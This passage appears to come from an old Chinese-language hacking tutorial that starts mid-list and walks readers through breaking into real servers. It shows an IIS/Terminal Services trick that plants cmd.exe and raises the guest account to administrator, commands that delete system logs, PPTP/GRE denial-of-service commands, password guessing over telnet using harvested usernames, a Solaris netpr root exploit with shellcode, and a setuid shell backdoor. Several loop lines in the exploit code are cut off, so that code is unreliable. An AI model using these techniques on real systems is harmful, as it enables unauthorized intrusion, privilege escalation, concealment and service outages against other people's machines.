4、在輸入法狀態條上按mouse右鍵,選擇幫助,選擇輸入指南,選擇"選項"按右鍵。
5、選擇"跳轉到URL",輸入:c:/winnt/system32/cmd.exe.
6、選擇"保存到磁盤"。
7、選擇目錄:c:/inetpub/scripts/
8、打開IE,輸入:xx.xx.xx.xx/scripts/cmd.exe?/c+dir+c:/ (知道了吧)
9、輸入:xx.xx.xx.xx/scripts/cmd.exe?/c+echo+BEIJING+
>c:/inetpub/wwwroot/default.asp
還有一種方法
1.掃描 3389 port 終端服務默認;
2.用終端客戶端程序進行連接;
3.按ctrl+shift調出全拼輸入法(其他似乎不行),點鼠標右鍵(如果其幫助菜單發灰,就趕快趕下家吧,人家打補丁了),點幫助,點輸入法入門;
4.在"選項"菜單上點右鍵--->跳轉到URL",輸入:c:/winnt/system32/cmd.exe.(如果不能確定NT系統目錄,則輸入:c:/ 或d:/ ……進行查找確定);
5.選擇"保存到磁盤" 選擇目錄:c:/inetpub/scripts/,因實際上是對方服務器上文件自身的複製操作,所以這個過程很快就會完成;
6.打開IE,輸入: http://ip/scripts/cmd.exe?/c dir 怎麼樣?有cmd.exe文件了吧?這我們就完成了第一步;
7. http://ip/scripts/cmd.exe?/c echo net user guest /active:yes>go.bat
8. http://ip/scripts/cmd.exe?/c echo net user guest elise>>go.bat
9. http://ip/scripts/cmd.exe?/c echo net localgroup administrators /add guest>>go.bat
10. http://ip/scripts/cmd.exe?/c type go.bat 看看我們的批文件內容是否如下:
net user guest /active:yes
net user guest elise
net localgroup administrators /add guest
11.在"選項"菜單上點右鍵--->跳轉到URL",輸入:c:/inetpub/scripts/go.bat --->在磁盤當前位置執行;
12.呵呵,大功告成啦,這樣我們就激活了服務器的geust帳戶,密碼爲:elise,超級用戶呢! (我喜歡guest而不是建立新帳戶,這樣似乎不易被發現些),
最後一定別不記的X掉自已的腳印
del+C:/winnt/system32/logfiles/*.*
del+C:/winnt/ssytem32/config/*.evt
del+C:/winnt/system32/dtclog/*.*
del+C:/winnt/system32/*.log
del+C:/winnt/system32/*.txt
del+C:/winnt/*.txt
del+C:/winnt/*.log
6 教你DoS攻擊微軟的PPTP
呵呵,大家沒有看錯,的確是微軟的,我們先看看PPTP是個什麼東東PPTP(Piont-to-point Tunneling Protocol 點對點傳輸協議)是一個用以建立VPN的網絡協議. 此協議需TCP(端口1723)和GRE以完成工作.
易收攻擊系統:
* Dell PowerEdge 2200 with Intel 10/100 adapter, 256 MB RAM, NT Server 4.0
* Dell Dimension XPS M200s with 3Com 905B adapter, 64 MB RAM, NT Server 4.0
安全的系統:
* HP Vectra XA with AMD PCNet integrated Ethernet, 128 MB RAM, NT Workstation 4.0
* Dell Latitude CPx with 3Com 3CCFEM656 PC Card adapter, 128 MB RAM, NT Workstation 4.0
* Generic dual PII (Asus motherboard) with 3Com 980x adapter, 256 MB RAM, NT Server 4.0
* Dell Dimension XPS T550 with 3Com 905C-TX adapter, 128 MB RAM, NT Workstation 4.0
如何實現:
~~~~~~~~~
*需要的工具*
1.UNIX box(例如linux,*bsd....)
2.netcat ( http://www.l0pht.com/~weld/netcat/ )
3.apsend ( http://www.elxsi.de/ )
4.ipsend ( http://coombs.anu.edu.au/~avalon/ )
OK,這就好說了,
我們來看它的三個BUG
1 TCP端口1723
此弱點只在prior至SP6的機器上有效。並不是所有的機器都存在這個漏洞;請在Unix 操作系統內鍵入以下:
$ nc 1723 < /dev/zero
如機器存在此漏洞, 目標主機將在幾秒種之內藍屏,並有如下錯誤:
STOP 0x0A (0x0, 0x2, 0x0, 0x0) IRQL_NOT_LESS_OR_EQUAL
再次提醒,此弱點只對部分機器有效
2 GRE
此弱點對所有Service pack有效
在目標機器上,打開任務管理器選擇“運行”。並打開 一個DOS窗口(開始-運行-CMD).在Unix類操作系統上:
$ apsend -d --protocol 47 -m 0 -q
在目標主機上你將看到任務管理器內內核記憶的數字將緩慢上升。最終,這些數字將停止增加;此時, CPU在一段時間內有可能被100%佔用。現在你可以試着在命令提示符後鍵入一個命令例如DIR,這時你將看 到一個信息說提示操作系統已不可能完成要執行的命令
3弱點三:GRE
此弱點同樣對所有的Service pack有效。請在Unix操作系統上:
#!/bin/csh
foo:
ipsend -i -P gre > /dev/null
goto foo
目標主機很快會藍屏,大概需要50個數據包。
明白了吧
7 UNIX攻擊
這裏爲了方便我們用finger 0@ip 來找UNIX的薄弱機器
C:/>finger 0@IP
xxx.xxx.xxx.xxx]
Login Name TTY Idle When Where
daemon ??? < . . . . >
bin ??? < . . . . >
sys ??? < . . . . >
jeffrey ??? pts/0 203.66.149.11
daniel ??? 437 114cm.kcable.
jamie ??? 0 203.66.162.68
postgres ??? pts/2 203.66.162.80
nsadmin ??? 768 203.66.19.50
ho ??? 390 61.169.209.106
house18 ??? pts/1 203.66.250.1
tong ??? pts/0 210.226. 42.69
jliu ??? pts/0 203.66.52.87
ptai ??? < . . . . >
看到了嗎,這裏的LOGIN下的就是我們要的用戶名了
比如jeffrey,Daniel,Jamie,postgres
下面我們就來入侵
C:/>telnet xxx.xxx.xxx.xxx
一般的情況下我們都是猜密碼,怎麼猜??就是上面LOGIN下的用戶名讓它又做用戶名和密碼呀,事實上總有一些人爲了方便是這麼設置的
login: ptai (***輸入用戶名***)
Password: **** (***輸入密碼***)
Login incorrect (***登陸失敗***)
login: jliu
Password:
Login incorrect
$ login: tong
Password:
Last login: Mon Jul 2 13:21:55 from 210.226. 42.69 (***這個用戶上次登陸時的IP***)
Sun Microsystems Inc. SunOS 5.6 Generic August 1997
You have mail. (***HOHO~登陸成功啦***)
看看這不就進來了
$ uname –a (***查看系統版本和補丁信息***)
$ set (***查看一些系?潮淞啃畔?**)
$w 看看用戶情況
$ gcc 我們看看有沒有編輯器,以後你就知道有什麼用了
gcc: No input files
看到沒有GCC呀
$ ls -al
total 14
drwxrwxr-x 2 delex staff 512 Jul 4 18:28 .
drwxr-xr-x 35 root root 1024 May 7 10:46 ..
-rw-r--r-- 1 delex staff 144 May 2 10:46 .profile
-rw------- 1 root staff 320 Jul 4 18:52 .sh_history
-rw-r--r-- 1 delex staff 124 May 2 10:46 local.cshrc
-rw-r--r-- 1 delex staff 581 May 2 10:46 local.login
-rw-r--r-- 1 delex staff 562 May 2 10:46 local.profile
$ cat /etc/passwd (***檢查/etc/passwd***)
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x Nobody:/:
dennis:x:1005:20::/export/home/dennis:/bin/sh
oracle:x:1001:100::/export/home/oracle:/bin/sh
render7:x:9589:101::/export/home/render7:/bin/sh
$ ls -al / (***查看根目錄是否有.rhosts等文件***)
計算機輸入信息略
$ netstat -an|grep LISTEN (***查看有沒有可疑端口***)
*.111 *.* 0 0 0 0 LISTEN
*.21 *.* 0 0 0 0 LISTEN
*.23 *.* 0 0 0 0 LISTEN
*.514 *.* 0 0 0 0 LISTEN
*.513 *.* 0 0 0 0 LISTEN
*.512 *.* 0 0 0 0 LISTEN
*.540 *.* 0 0 0 0 LISTEN
*.79 *.* 0 0 0 0 LISTEN
*.37 *.* 0 0 0 0 LISTEN
*.7 *.* 0 0 0 0 LISTEN
*.9 *.* 0 0 0 0 LISTEN
*.13 *.* 0 0 0 0 LISTEN
*.19 *.* 0 0 0 0 LISTEN
….
$ cd /tmp
$ ls -al
好像沒有什麼問題我們來提升權限
$ set
$ uname -a
SunOS develop 5.7 Generic_106541-14 sun4u sparc SUNW,Ultra-5_10
$ cd /tmp
$ cat > test.c (***用cat命令寫一個文件***)
這是核心呀,這就是拿到ROOT權限中重要的一步
*## copyright LAST STAGE OF DELIRIUM dec 1999 poland *://lsd-pl.net/ #*/
/*## /usr/lib/lp/bin/netpr #*/
/* requires to specify the address of a host with 515 port opened */
#define NOPNUM 4000
#define ADRNUM 1200
#define ALLIGN 3
char shellcode[]=
"/x20/xbf/xff/xff" /* bn,a */
"/x20/xbf/xff/xff" /* bn,a */
"/x7f/xff/xff/xff" /* call */
"/x90/x03/xe0/x20" /* add %o7,32,%o0 */
"/x92/x02/x20/x10" /* add %o0,16,%o1 */
"/xc0/x22/x20/x08" /* st %g0,[%o0+8] */
"/xd0/x22/x20/x10" /* st %o0,[%o0+16] */
"/xc0/x22/x20/x14" /* st %g0,[%o0+20] */
"/x82/x10/x20/x0b" /* mov 0xb,%g1 */
"/x91/xd0/x20/x08" /* ta 8 */
"/bin/ksh"
;
char jump[]=
"/x81/xc3/xe0/x08" /* jmp %o7+8 */
"/x90/x10/x00/x0e" /* mov %sp,%o0 */
;
static char nop[]="/x80/x1c/x40/x11";
main(int argc,char **argv){
char buffer[10000],adr[4],*b,*envp[2];
int i;
printf("copyright LAST STAGE OF DELIRIUM dec 1999 poland //lsd-pl.net//n");
printf("/usr/lib/lp/bin/netpr solaris 2.7 sparc/n/n");
if(argc==1){
printf("usage: %s lpserver/n",argv[0]);
exit(-1);
}
*((unsigned long*)adr)=(*(unsigned long(*)())jump)()+7124+2000;
envp[0]=&buffer[0];
envp[1]=0;
b=&buffer[0];
sprintf(b,"xxx=");
b+=4;
for(i=0;i<1+4-((strlen(argv[1])%4));i++) *b++=0xff;
for(i=0;i
for(i=0;i
*b=0;
b=&buffer[5000];
for(i=0;i
for(i=0;i
*b=0;
execle("/usr/lib/lp/bin/netpr","lsd","-I","bzz-z","-U","x!x","-d",argv[1],
"-p",&buffer[5000],"/bin/sh",0,envp);
}
^D
(***這裏是按ctrl + d 結束寫文件,你用vi來寫也可以,ftp,rcp等上傳也可以。***)
(***源程序在 http://lsd-pl.net/files/get?SOLARIS/solsparc_netpr ***)
$ ls -al /tmp (***查看test.c是否建立***)
找到了吧,哪我們就成功的建立了
$ gcc -o test test.c 編輯它,使它溢出
$ ./test
copyright LAST STAGE OF DELIRIUM dec 1999 poland //lsd-pl.net/
/usr/lib/lp/bin/netpr solaris 2.7 sparc
usage: ./test lpserver
$ ./test localhost
copyright LAST STAGE OF DELIRIUM dec 1999 poland //lsd-pl.net/
/usr/lib/lp/bin/netpr solaris 2.7 sparc
# id
uid=1035(delex) gid=20(staff) euid=0(root) (***成功獲得root***)
OK,想做什麼就看你的了下面是一些題外話了
# mkdir /usr/lib/...
# cp /bin/ksh /usr/lib/…/.x (***做個簡單的後門***)
# chmod +s /usr/lib/…/.x
# cat /etc/hosts (***看看這個網絡多大***)
以下是在上面所要用到的掃描器和原代碼
SuperScan 3.0 http://www.cnhonker.com/tmp/SuperScan.zip
SecureCRT 3.3 http://www.cnhonker.com/tmp/SecureCRT3.3.zip
裏面所用到的有些程序代碼請到 http://lsd-pl.net/ 或 http://www.hack.co.za 查找。
其實每個操作系統都有漏洞,簡單的說我們只要找到該系統對應的漏洞然後編輯它,使它溢出就可以了,這也是黑客最常用的手法
8,D.O.S
呵呵,還記的對白宮的DOS之戰嗎,呵呵,哪還不來試試
下載軟件
FakePing的工具 Http://www.patching.net/shotgun/FakePing.exe
下載 udpflood.zip
安裝網址: http://202.102.230.155/netsafe/software/hacker/attack.htm
9 備註
還有一些很好的漏洞資料請大家好好學學
IIS 漏 洞 整 理
http://www.net228.com/bbs/cgi-bin/topic.cgi?forum=9&topic=33
利用wu-ftpd2.x(site exec bug)取得root權限
http://www.net228.com/bbs/cgi-bin/topic.cgi?forum=9&topic=38
入侵檢測系統(IDS)簡介 轉載
http://www.net228.com/bbs/cgi-bin/topic.cgi?forum=9&topic=32
FRONTPAGE漏洞的執行
http://www.net228.com/bbs/cgi-bin/topic.cgi?forum=9&topic=63
ASP漏洞(1)
http://www.net228.com/bbs/cgi-bin/topic.cgi?forum=9&topic=59
ASP漏洞(2)
http://www.net228.com/bbs/cgi-bin/topic.cgi?forum=9&topic=60
ASP漏洞(3)
http://www.net228.com/bbs/cgi-bin/topic.cgi?forum=9&topic=61
CGI漏洞
http://www.net228.com/bbs/cgi-bin/topic.cgi?forum=9&topic=55
IIS漏洞及應用
http://www.net228.com/bbs/cgi-bin/topic.cgi?forum=9&topic=49
漏洞掃描器大集合
http://www.net228.com/bbs/cgi-bin/topic.cgi?forum=9&topic=87
好了,總算是完成了,大家只要認真的看了,就一定會在技術上有進一步的提高,當然以後大家就只有自已學了,寫的不好,請大家見諒
